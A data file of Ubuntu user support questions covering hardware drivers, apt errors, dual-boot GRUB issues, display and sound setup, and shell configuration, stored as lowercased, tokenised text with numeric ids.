523675	how to disable ps3 accelerometers through usb , no bluetooth	how do i disable the tilt accelerometers when using ps3 controller with usb ? i dont have a bluetooth adapter and i dont wan na buy one . i am using 64 bit ubuntu 14.04 with patched kernel 3.13.11.6+ qtsixa settings does not modify my controller in any way no matter what settings i use . i think thats because its not connected through bluetooth . however it does see the controller and i can use the controller , but the tilt accelerometers get in the way when trying to setup controls for emulators . i have googled and googled , but all i find are how to 's involving bluetooth . please help me solve this issue -_-
523676	malformed line in apt sources	i am trying to use apt-get install and it is not working . i keep getting this : e : malformed line 1 in source list /etc/apt/sources.list.d/libdvdcss.list ( dist ) e : the list of sources could not be read . can anyone help ?
523677	`` error : can not open display : :0.0 '' while starting remotelly firefox	on my ubuntu 14.04 remote server , when i try to start mozilla firefox 32.0 from terminal , it through error as follow : $ firefox ( process:6397 ) : glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed error : can not open display : :0.0 i have tried by changing display to 1 , 10 , 11 , 99 , however , no luck ! banging my head from a week . any help will be appreciable .
523678	xbmc upstart scrip delivers no sound	i want xbmc to start on boot , as well as restart when it crashes . currently , i auto-login to a user ( 'public ' ) and have xbmc as a startup application . but if xbmc crashes it does not restart , which is problematic for my computer-illiterate family , if not for me personally . since i am used to /etc/init/ scripts , i followed this guide , creating the following script ( but with user=public instead of 'xbmc ' ) : # xbmc-upstart # starts xbmc on startup by using xinit . # by default runs as xbmc , to change edit below . env user=xbmc description `` xbmc-barebones-upstart-script '' author `` matt filetto '' start on ( filesystem and stopped udevtrigger ) stop on runlevel [ 016 ] # tell upstart to respawn the process if abnormal exit respawn script exec su -c `` xinit /usr/bin/xbmc -- standalone -- -nocursor :0 '' $ user end script it works perfectly in the sense that the machine boots into xbmc , but now i have no sound ! and when i exit xbmc , it directly restarts , which means that i can not ( that is , i do not have the skills to know how to , at least ) check the sound settings from unity . advice on how to get the sound working ?
523679	create application shortcut on the desktop	i tried to create an application shortcut to my desktop . i am unable to move the icon to the desktop like windows does . do i need do code or configure to have my application on the desktop ? your help and information is great appreciated , regards , iccsi
523681	exports in .bashrc not working	i have a program .path.py which prints an export command for path . in my .bashrc i have an entry at the top $ ( python $ home/.prefix/.path.py ) except that when i login over ssh , or even run source $ home/.bashrc those paths are not exported . manually running $ ( python $ home/.prefix/.path.py ) works fine though . on other linux systems i 've used this method normally works fine , it 's just on my ubuntu 14.04 desktop that it is n't . can anyone help me fix this ? comment with any additional information which would be helpful . please note there are no newlines in this text , only spaces . export path=/home/username/.prefix/calc/bin : /home/username/.prefix/misc/bin : /home/username/.prefix/testu01/bin : /home/username/.prefix/calc/bin : /home/username/.prefix/misc/bin : /home/username/.prefix/testu01/bin : /home/username/bin : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : /opt/intel/bin/ cplus_include_path=/home/username/.prefix/calc/include : /home/username/.prefix/misc/include : /home/username/.prefix/testu01/include : /home/username/.prefix/calc/include : /home/username/.prefix/misc/include : /home/username/.prefix/testu01/include : /home/username/.prefix/calc/include : /home/username/.prefix/misc/include : /home/username/.prefix/testu01/include : library_path=/home/username/.prefix/calc/lib : /home/username/.prefix/calc/lib64 : /home/username/.prefix/misc/lib : /home/username/.prefix/misc/lib64 : /home/username/.prefix/testu01/lib : /home/username/.prefix/testu01/lib64 : /home/username/.prefix/calc/lib : /home/username/.prefix/calc/lib64 : /home/username/.prefix/misc/lib : /home/username/.prefix/misc/lib64 : /home/username/.prefix/testu01/lib : /home/username/.prefix/testu01/lib64 : /home/username/.prefix/calc/lib : /home/username/.prefix/calc/lib64 : /home/username/.prefix/misc/lib : /home/username/.prefix/misc/lib64 : /home/username/.prefix/testu01/lib : /home/username/.prefix/testu01/lib64 : c_include_path=/home/username/.prefix/calc/include : /home/username/.prefix/misc/include : /home/username/.prefix/testu01/include : /home/username/.prefix/calc/include : /home/username/.prefix/misc/include : /home/username/.prefix/testu01/include : /home/username/.prefix/calc/include : /home/username/.prefix/misc/include : /home/username/.prefix/testu01/include : ld_library_path=/home/username/.prefix/calc/lib : /home/username/.prefix/calc/lib64 : /home/username/.prefix/misc/lib : /home/username/.prefix/misc/lib64 : /home/username/.prefix/testu01/lib : /home/username/.prefix/testu01/lib64 : /home/username/.prefix/calc/lib : /home/username/.prefix/calc/lib64 : /home/username/.prefix/misc/lib : /home/username/.prefix/misc/lib64 : /home/username/.prefix/testu01/lib : /home/username/.prefix/testu01/lib64 : /home/username/.prefix/calc/lib : /home/username/.prefix/calc/lib64 : /home/username/.prefix/misc/lib : /home/username/.prefix/misc/lib64 : /home/username/.prefix/testu01/lib : /home/username/.prefix/testu01/lib64 :
523685	start up a .jar gui application from login screen	i have raspberry pi and i have compiled unicentapos in a .jar file . however i want to start this gui application without the full desktop . i just want to application running with the gui . i have looked around and i have found bits and pieces of info but still ca n't get it to work . can anyone guide me through this ? ( for conversation sake , just guide me like i do n't know how todo it. ) . also .jar file does run once i click it on the desktop so it 's not that it ca n't run the .jar file .
523686	new to xubuntu . need help with scaling menu and title bar	i own a lenovo yoga 2 pro which has a resolution of 3200x1800 . when i was running ubuntu before xubuntu i was able to use a scaling option to enlarge the menu and title bar in display settings , on xubuntu i am unable to find that scaling option , does anyone know how i make this possible ?
523691	how to manually generate video thumbnails ?	i 'm using ubuntu 14.04 and i want to ask how to generate video thumbnaiils manually ? in some videos , the generated thumbnail is the logo of the company ( in the very beggining of the video ) , and not the content itself i want . is there any option to add a manual thumbnail to a video in ubuntu 14.04 ? thanks in advance
523692	apt-get upgrade has no errors but no effect	i 'm trying to upgrade to the latest version of ubuntu , it is n't working and i 'm also not seeing any error messages ... so i 'm not really sure what the issue is or where to start looking ... any help would be appreciated . $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.5 lts release : 12.04 codename : precise $
523693	opengl glx context not using direct rendering ( steam )	i have been using ubuntu 14.04 , configuring it with themes and such , and decided to install steam to play team fortress 2 . whenever i launch steam , i get an error that says : '' opengl glx context is not using direct rendering , which may cause performance problems . for more information visit https : //support.steampowered.com/kb_article.php ? ref=9938-eyzb-7457 . '' i am using 2 nvidia geforce gtx 285m gpu 's with sli . i have tried many solutions but none of them have worked for me , any suggestions ?
523695	ubuntu installed /home to visible raid array , but ca n't find it on boot	i 'm using the desktop version of ubuntu 14.04.1 . i started up the livecd , installed mdadm , and created a raid 1 array on a 3 tb hd . i then restarted , went directly into the installation menu , and set up a new installation with / and swap on two partitions on the ssd , and /home on the raid 1 array . the installer seemed to have no problems with this arrangement , but upon restarting into the new installation , i 'm told that `` the disk drive /home is not ready yet '' . my first thought was that perhaps mdadm was n't installed on the new system , so it had no way to read the drive , but i ca n't imagine ubuntu installer would recognize and install to a raid array without including the necessary packages to read said array . i 'm not sure how to go about diagnosing this - any ideas ? edit : after discovering that my new installation did n't have mdadm installed on it for whatever reason , i restarted and used the manual recovery mode to get to a root terminal . it seems like it would be possible to install mdadm from here , but i ca n't get an internet connection to work . i used `` ifconfig eth0 up '' to activate the ethernet , and tried pinging with and without lo disabled , but ca n't seem to get a connection to stick .
523699	debian wheezy on samsung np900x3a some fn keys do n't work	i 've gone through all questions and tutorials on how to solve this problem . they were n't meant for my laptop version but `` close enough '' . unfortunately they did n't help . this is the case . # /lib/udev/keymaps/samsung-900x3a 0xce prog1 # fn+f1 system settings ( does n't work ) 0x89 brightnessdown # fn+f2 brightness down 0x88 brightnessup # fn+f3 brightness up 0x82 switchvideomode # fn+f4 switch video mode 0xf9 f23 # fn+f5 turn touchpad off 0xa0 silentmode # fn+f6 silentmode ( does n't work ) 0xae kbdillumdown # fn+f7 keyboard backlight down ( does n't work ) 0xb0 kbdillumup # fn+f8 keyboard backlight up ( does n't work ) 0x97 mute # fn+f9 mute 0x96 volumedown # fn+f10 volume down 0xb3 volumeup # fn+f11 volume up 0xd5 wlan # fn+f12 wifi ( does n't work ) # /lib/udev/keymaps/force-release/samsung-900x3a 0xce # fn+f1 system settings 0x89 # fn+f2 brightness down 0x88 # fn+f3 brightness up 0x82 # fn+f4 switch video mode 0xf9 # fn+f5 turn touchpad off 0xa0 # fn+f6 silentmode 0xae # fn+f7 keyboard backlight down 0xb0 # fn+f8 keyboard backlight up 0x97 # fn+f9 mute 0x96 # fn+f10 volume down 0xb3 # fn+f11 volume up 0xd5 # fn+f12 wifi # /lib/udev/rules.d/95-keymap.rules [ ... ] env { dmi_vendor } == '' [ ss ] [ aa ] [ mm ] [ ss ] [ uu ] [ nn ] [ gg ] * '' , attr { [ dmi/id ] product_name } == '' 900x3a* '' , run+= '' keyboard-force-release.sh $ devpath samsung-900x3a '' [ ... ] i even copied the first 2 files to already existing ones , but it still does n't work . any ideas ?
523702	ethernet stopped working on ubuntu 14.04 , still works on windows	everything was working fine on my ubuntu 14.04 32 bit installation ( on a dell vostro laptop ) yesterday . i shut it down last night and since i powered it up this morning it is no longer handling the graphics correctly - it 's very low resolution - and the ethernet connection does not work at all . when i reboot into windows 7 , the ethernet and graphics work fine . the ethernet controller is detected but it 's not using it ? ! lshw -c network reports : *-network unclaimed description : network controller product : ar9285 wireless network adapter ( pci-express ) vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:0c:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f69f0000-f69fffff *-network unclaimed description : ethernet controller product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:09:00.0 version : 03 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list configuration : latency=0 resources : ioport : ce00 ( size=256 ) memory : f0204000-f0204fff memory : f0200000-f0203fff memory : f0220000-f023ffff the commands /etc/init.d/networking restart and /etc/init.d/networking force-reload produce no output and have no apparent effect . ifconfig shows only the loopback interface , no others . the only new software i recall installing yesterday was the aspectj package . and the ethernet still worked fine after i installed it , until i power cycled .
523703	installing openjdk java 6 runtime takes forever/doesnt work	and thanks in advance , ok so when i open ubuntu software center , everything runs smoothly . it opens , the homepage loads and everything works fine . i search `` java '' int the search bar and the results load . i click on `` openjdk java 6 runtime '' and it works . its says `` available from the `` universe '' source '' . i click on `` use this source '' and it starts installing . it all looks fine and dandy until a error message pops up saying failed to download repository information check your internet connection . the details say this : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal/main/source/sources 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal/restricted/source/sources 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal/universe/source/sources 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal/multiverse/source/sources 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal/main/binary-i386/packages 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal/restricted/binary-i386/packages 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal/universe/binary-i386/packages 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal/multiverse/binary-i386/packages 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-updates/main/source/sources 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-updates/restricted/source/sources 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-updates/universe/source/sources 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-updates/multiverse/source/sources 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-updates/main/binary-i386/packages 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-updates/restricted/binary-i386/packages 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-updates/universe/binary-i386/packages 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-updates/multiverse/binary-i386/packages 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-backports/main/source/sources 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-backports/restricted/source/sources 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-backports/universe/source/sources 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-backports/multiverse/source/sources 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-backports/main/binary-i386/packages 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-backports/restricted/binary-i386/packages 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-backports/universe/binary-i386/packages 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-backports/multiverse/binary-i386/packages 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-security/main/source/sources 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-security/restricted/source/sources 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-security/universe/source/sources 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-security/multiverse/source/sources 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-security/main/binary-i386/packages 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-security/restricted/binary-i386/packages 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-security/universe/binary-i386/packages 404 not found [ ip : 91.189.88.149 80 ] , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-security/multiverse/binary-i386/packages 404 not found [ ip : 91.189.88.149 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead . please help , i ca n't install anything . i am a newbie to ubuntu . i am using ubuntu 12.10
523705	hiding files in nautilus using .hidden does not work	on my windows network drives , some folders have a large number of files beginning with ~ $ . i would like to hide these files in nautilus . i 've tried adding the file names to a .hidden file ( as documented here ) , but it does n't seem to recognize them , i 'm assuming because of the tilde in front . is there a way to either make the file names be recognized from the .hidden file , or to add a rule to nautilus to hide such file prefixes ?
523706	ndiswrapper help needed !	hello i am new to ubuntu linux and have a belkin n600db wifi usb adapter . it does not work with linux . i read some tutorials but could not heads or tails out of it . can anyone dumb it down for me and explain how to use ndis wrapper ? thank you
523707	grub dual boot , multiple drives , booting into windows encounter vss spp backup errors	i have a new multi-disc drive computer . windows 7 os is installed on a sata drive with ntfs file sytem . ubuntu trusty tahr 14.04 is installed on a solid state drive using ext4 . i hava a third drive with ntfs partitions and ext4 partition for data and system backups . i can boot into both windows and ubuntu systems using the grub boot loader , to windows using the windows boot loader , or independently by entering bios and selecting the drive using boot overide options as required . if i access windows via windows boot loader , i am able to create a windows backup-restore and system image to my backup drive ntfs partitions . if i access windows via the grub boot loader , whilst the rest of the system seems to be functional , i encounter `` vss and spp shadow could not be created error '' when attempting to create a backup ( with and without a system image ) to my ntfs patitions . my settings for vss and spp services within windows display the same regardless of whether i attempt backup from a windows boot loader / grub boot loader loaded windows session . i can write non-backup files to my data backup drive from both ubuntu and from windows . my ubuntu install appears to be working without issue . i can see all drives and partitions within ubuntu , and all ntfs drives and partitions in windows . i understand that using third party software to perform backups and system images might be a possible solution , but ideally it should be possible to resolve this whithout doing so ? sorry that this is not a strictly grub / ubuntu issue but any assistance with this would be appreciated .
523708	search home.network keeps appearing in my resolv.conf	`` search home.network '' keeps appearing my resolv.conf . because of that some web pages do n't load . is there some way of disabling it ? my resolv.conf is managed by puppet .
523709	google chrome leaving processes live after closing	i 've had problems with google chrome that when i close it and then re-open it i get the error message the the profile could not be opened correctly . i 've traced this problem down to the fact that when google chrome closes it leaves several processes live in the process manager . if i kill all the left over processes manually once chrome has been closed then when i re-start chrome it does not give the `` profile could not be opened '' error message . can anyone help with this problem ? ! screen print
523715	is it worth it to upgrade my ram ?	i currently have a 1.9ghz amd processor and 4gb of ram . i 'm wondering if it would actually make ubuntu ui faster if i upgraded to 8gb or is it not worth the bother with my current processor ?
523716	how do i install wine on my chromebook running crouton ? ? ? i am super noob	hey so i just got crouton to run so that i can switch seamlessly between my chrome os and crouton but now i 'm a bit stuck . winehq says to add their updater to the repository using the software center . i ca n't find the software center ... ou i asked a user on another forum and he said that the software center is pretty useless and that i do n't need it to install wine . when i click the hyperlink to download wine it does n't work from crouton or chrome os . i really have no clue what i am doing and to help me you might have to explain it as if you are explaining it to a kid as i do not know a lot of the technical terms . really sorry but am greatly appreciative of anyone who can help me . thanks ! ! !
523717	key word remap enter carriage return vim command line	in my .vimrc file i have : imap ii < cr > which allows me to hit ii for enter/carriage return in vim but now i would like to set that same configuration in my .inputrc so that i can just hit ii when i need to hit enter in command line . this is my .inputrc config which is set to vi and also has an if that takes me into normal mode when i hit `` sv '' set editing-mode vi $ if mode=vi # insert mode set keymap vi-insert `` sv '' : vi-movement-mode # remap escape $ endif i would prefer if i could map ii carriage return in normal and or insert mode in an if statement so that i can switch it back when i remove the vi editing mode . thank you i have since figured it out $ if mode=vi set keymap vi-insert `` uu '' : accept-line $ endif this allows me to use uu as my enter in my command line while using an if statement
523721	installation of ubuntu 11.10 wifi drivers	i installed ubuntu 11.10 with no internet connection . how do i install wifi drivers .
523722	i am currently on version 12.10 but the sound does not work and i can not update the software , i keep getting error messages	any suggestions on how i can get this fixed or reinstall ?
523724	connecting to wi-fi	ok . so i am absolutely new to ubuntu and i have the 10.10 version installed because the other versions would n't boot on my computer and every time i tried to boot them it would say missing operating system . i have a hp laptop probook 4540s and i have deleted windows during my installation . i am using a wired connection right now . every time i am disconnected from my wired connection there is no white bars going outwards and it has a red exclamaion mark next to the wifi icon . when i left click on it it says wired network and all the options for it are grayed out . then it just says vpn connections > configure vpn . this is without my wired connection btw . there is n't even a grayed out wifi option . when i right click it says ( tick ) enable networking ( tick ) enable notifications connection information edit connections ... about none of these options are grayed out . i have tried everything and looked this up on all kinds of forums so plllllllzzzzzz help ! ! ! also when i go to additional drivers with my wired connection it doesnt even start up , it just stops loading and exits halfway through . with internet though it pops with no options other than to exit . when i try to boot it up without internet and let it load until its done , i plug the connection back in . but nothing happens . please help !
523725	proxy hostname in versi0on 15.1	i am a complete newby to ubuntu ! downloaded harves hamshack.i can access the web with ham radio programs but can get onto the internet using any other method.the program just says `` ca n't resolve `` proxy hostname '' i have two other computers and neither one has that problem..xp and vista .
523726	include any directory from tree to httpdocs folder	ubuntu 12.04 , running on apache server . is possible to run/access from browser html/php file from other than document root location let 's say from folder /testfolder on the root so once i enter in browser example.com/testfolder it will be executed the same as from var/www/example.com/httpdocs/testfolder . but files and this folder will be on the root in /testfolder not in document root ( httpdocs ) i do n't want to put this folder physically at all in httpdocs . goal is to hide those files/folder from default www vhost folder . i do n't want to change path but just put additional files which logically will exist in some other location on disk not default vhost document root folder . i have tried with alias and directory but not worked .
523727	custom columns in rhythmbox	i would like to be able add custom columns in rhythmbox for things like `` version '' and `` grouping '' . is there a .ui file in /usr/share/rhythmbox or elsewhere that i need to edit in order to do this ; and if so which one . i 've figured out how to add a checkbox in the preferences menu for such a thing , but i ca n't figure how to add a column that pulls the correct data from the tags .
523728	uninstall package compiled from source	this question extends this one , where the advice is to use checkinstall in the future . sound advice , but i wonder if it is possible to just repeat the compile process and then store the list of files to be install the second time around , and then script removal according to the outcome of the list from the second make install ? or alternatively , if checkinstall is used to install the same package , will the files overwrite the ones from the first build and accordingly , be removable by the package manager ?
523730	cant start windows os after ubuntu installation crash	i recently bought a new asus zenbook ux301 series with windows 8 . i then updated to windows 8.1 . i have used ubuntu before , and have had it installed through virtualbox on my macbook for over a year now . i consider myself a novice with linux and have n't used windows since vista . i have been following this website to install ubuntu 14.04 alongside windows 8.1 http : //www.everydaylinuxuser.com/2014/05/install-ubuntu-1404-alongside-windows.html i got all the way to the end of step 6 , with only a few minor bumps , to where ubuntu was being installed from my usb drive . i literally leave the room for 5 minutes , and come back to an error message saying `` installation crashed '' and my screen turned empty . i turned my computer off and back on , to where it started up and loaded ubuntu asking for my username and password . i 'm not quite sure whats wrong with the distribution , or even how to get back to windows 8.1 if i wanted too . i did n't save a backup windows os on a flash drive because i literally just bought the computer and did n't think i would need it . is there anyway to get windows 8.1 back , or if need be reset my asus zenbook back to factory settings from ubuntu ? any advice would be greatly appreciated .
523731	change computer name after install ubuntu 14.04	i wanted to change my computer name after i installed ubuntu 14.04 lts . are there any place i can do this ? your help and information is great appreciated , regards , iccsi ,
523732	ubuntu 14.04 freezes	ubuntu keeps freezing on my desktop pc sometimes when i try to close a programm . i can still move the mouse and some effects like the button press when i smashing the xbutton of the programm windows still work but that was it , after some time the programm will close and then i can only move the mouse but nothing else reacts . ( not even ctrl alt f1 to switch to tty ) i i manage it switch to tty bevor that i get after some time this error messages ( and similar ) : someone allready sugested me that it 's a problem of my hdd but i had this error also when i put a completly different hdd in this pc ( also windows is running perfectly fine ) any guesses what could be wrong ? thank you very much
523733	uninstall selected packages by date	is there a way to uninstall all packages that were installed in a span of time between 1 min ? i tried using the synaptic package manager but i ca n't find any filter to be able to check only the packages that were installed at that time .
523734	steam problem with 32bit lib	after the installation it ask me this steam needs to install these additional packages : libgl1-mesa-dri : i386 , libgl1-mesa-glx : i386 , libc6 : i386 [ sudo ] password for giacomo : i insert the password and ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... lettura elenco dei pacchetti ... fatto generazione albero delle dipendenze lettura informazioni sullo stato ... fatto alcuni pacchetti non possono essere installati . questo puă˛ voler dire che ă¨ stata richiesta una situazione impossibile oppure , se si sta usando una distribuzione in sviluppo , che alcuni pacchetti richiesti non sono ancora stati creati o sono stati rimossi da incoming . le seguenti informazioni possono aiutare a risolvere la situazione : i seguenti pacchetti hanno dipendenze non soddisfatte : indicator-bluetooth : dipende : bluez ( > = 4.36 ) dipende : unity-control-center ma non sta per essere installato oppure gnome-control-center ma non sta per essere installato oppure ubuntu-system-settings ma non sta per essere installato dipende : gnome-bluetooth ma non sta per essere installato oppure ubuntu-system-settings ma non sta per essere installato libgl1-mesa-glx : i386 : dipende : libudev1 : i386 ma non sta per essere installato oppure libudev0 : i386 ma non ă¨ installabile libqt5feedback5 : dipende : libqt5multimedia5 ( > = 5.0.2 ) ma non sta per essere installato e : errore , pkgproblemresolver : :resolve ha generato delle interruzioni . questo potrebbe essere causato da pacchetti bloccati . press return to continue : what i can do ?
523736	curl to tar to zip not working properly	i am wanting to download an tar.gz archive , extract it and compress it into a zip file in one command . reason for this is to be independent from temporary files . the command i use : curl -l `` someurl '' | tar xozf - | zip -qr > /home/username/filename.zip gives me a zip file that contains a file named - . removing the - from the tar command leaves me with an zip file only containing a small portion of the downloaded file , while beeing a very large archive . maybe i am missing something out here ...
523739	am i protected over the internet with ubuntu , do i need an antivirus ?	i know that ubuntu is secure , but i 'm worried about my passwords when i login to my yahoo email , or my facebook . do i need an antivirus on ubuntu to be password protected when navigating over the internet ?
523743	ubuntu 12.04 lts update and ca n't login	my load of ubuntu 12.04 lts ( 32 bit ) was updated this morning . it reported that the update to 14.0x would not work and i could go ahead and do a partial update to 12.04 lts which i tried . after it rebooted i get to the login screen and ca n't login . i did some searching and found some others discussing this : can not login to my user account and 1 other thread with suggestions . i can do a ctrl alt f1 or ctrl alt f2 and login from the prompt there . some of the sudo commands from the thread above report the files or folders are not found ( hence maybe why i am not able to get in via the graphics interface ) ... i have to redownload the iso and burn it as any of the sudo get-apt commands i get a bunch of fetch errors ( they report e : failed to fetch http : //us.archive.ubuntu.com ... .. ) at the terminal prompts . so while i am awaiting the iso download , any suggestions or things i can check as far as folders or files missing ? best way to resolve this ? ( i have many years in working with pc 's but have not spent as much time in linux/ubuntu as i have in windows ) - backup the data ( just a few folders- documents and downloads that i 'd have to copy over ) and then start over with a new install ( and might as well go up to 14.04 lts if i do that ? ? any repair install ( or would that just leave me open to more problems down the road ) . ( note i had regularly had a few strange things happen on this existing load- like booting and message stating temp would not mount ) ...
523745	two monitor setup , icons / programs default to left screen all the time	i have dual monitor setup with my right monitor being my primary one . when i run a program or create an icon it always appears on the left monitor instead of the right one , even though the right monitor is set to primary . i 'm using ubuntu 14.04 with cinnamon desktop using nvidia drivers . how can i fix this ?
523748	what 's the proper way to identify the correct cpu temperature under lm-sensors ?	sensors output shows several temperatures , and they all differ , bios/uefi shows only one value . i would like to know how i can identify the sensor that corresponds to the one used by bios . judging by the temperature displayed under bios it seems to be it8771-isa-0290 : temp1 . some enlightenment would be appreciated . here 's my sensors output : acpitz-virtual-0 adapter : virtual device temp1 : +27.8°c ( crit = +106.0°c ) temp2 : +29.8°c ( crit = +106.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +51.0°c ( high = +85.0°c , crit = +105.0°c ) core 0 : +45.0°c ( high = +85.0°c , crit = +105.0°c ) core 1 : +42.0°c ( high = +85.0°c , crit = +105.0°c ) core 2 : +51.0°c ( high = +85.0°c , crit = +105.0°c ) core 3 : +47.0°c ( high = +85.0°c , crit = +105.0°c ) it8771-isa-0290 adapter : isa adapter in0 : +1.09 v ( min = +0.00 v , max = +3.06 v ) in1 : +2.22 v ( min = +0.00 v , max = +3.06 v ) in2 : +1.98 v ( min = +0.00 v , max = +3.06 v ) in3 : +2.03 v ( min = +0.00 v , max = +3.06 v ) in4 : +2.00 v ( min = +0.00 v , max = +3.06 v ) in5 : +2.22 v ( min = +0.00 v , max = +3.06 v ) in6 : +0.60 v ( min = +0.00 v , max = +3.06 v ) 3vsb : +4.58 v ( min = +0.00 v , max = +6.12 v ) vbat : +3.26 v fan1 : 1025 rpm ( min = 27 rpm ) fan2 : 1243 rpm ( min = 18 rpm ) temp1 : +41.0°c ( low = -1.0°c , high = +127.0°c ) sensor = thermistor temp2 : +32.0°c ( low = -1.0°c , high = +127.0°c ) sensor = thermistor temp3 : +50.0°c ( low = -1.0°c , high = +127.0°c ) sensor = intel peci intrusion0 : ok
523749	lubuntu allow non-admin to mount drive without admin password	i 'm the administrator of my lubuntu system . i only have one `` desktop user '' account for all kids . but when ever the desktop user tries to access or open the `` data '' [ ntfs partition ] ( drives where movies , pics , songs and other files are stored ) it asks for the administrator 's password . i created the user account for all my other family members and i do n't want to tell them my password . so is it possible to allow them to access the `` data '' ntfs partition without asking administrator 's password ? i says `` authentication is required to mount ( /dev/sdc7 ) '' i 'm on lubuntu 14.4.0 ( by the way how to check my installed lubuntu version ? ) and will it update from softwares & updates it self or i 'll always need to clean format install a never version everytime ?
523750	grub dont work with dualboot windows 8	i have window 8 installed , and installed in a second partition ubuntu 14.04 . the installation went ok , but on startup grub don`t work . window start just like before the installation . other place tell me to run boot-repair , but did n't work . in the advanced mode the tab for grub are deactivated , so i cant do much . the log generated : http : //paste.ubuntu.com/8339164/
